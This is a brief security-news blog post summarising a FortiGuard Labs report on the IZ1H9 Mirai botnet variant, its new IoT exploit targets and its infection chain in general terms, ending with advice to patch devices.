A new variant of the Mirai botnet, known as IZ1H9, has recently updated its collection of exploit payloads. These exploits target vulnerabilities in various Linux-based routers, IP cameras, and other IoT devices, including brands like D-Link, TP-Link, Zyxel, Netis, Sunhillo SureLine, Geutebruck, Yealink Device Management, TP-Link Archer, Korenix JetWave, and TOTOLINK.

This significant evolution in the botnet was discovered during a new DDoS campaign when FortiGuard Labs observed a peak in vulnerability exploitation on September 6, with tens of thousands of triggers being used.

Fortinet reports that the botnet now utilizes 13 new exploit payloads, ranging from flaws discovered in 2015 to those found in 2023. Among these, four flaws target D-Link devices, eight target Geutebruck products, one targets the Netis WF2419, one targets Korenix JetWave routers, and one targets the Sunhillo SureLine application. Additionally, there are 12 exploits targeting TOTOLINK routers.

The infection process involves injecting the IZ1H9 payload into a device after exploiting one of the mentioned vulnerabilities. This payload contains a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL. Once executed, the script deletes logs to hide any suspicious activity, retrieves bot clients compatible with different system architectures, and establishes communication with a C2 server to initiate various types of DDoS attacks.

Ultimately, it is crucial to address these vulnerabilities promptly to minimize the risks associated with device exposure. As the Mirai botnet continues to expand its arsenal of exploit triggers, timely application of security patches becomes increasingly important.


Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.

View Articles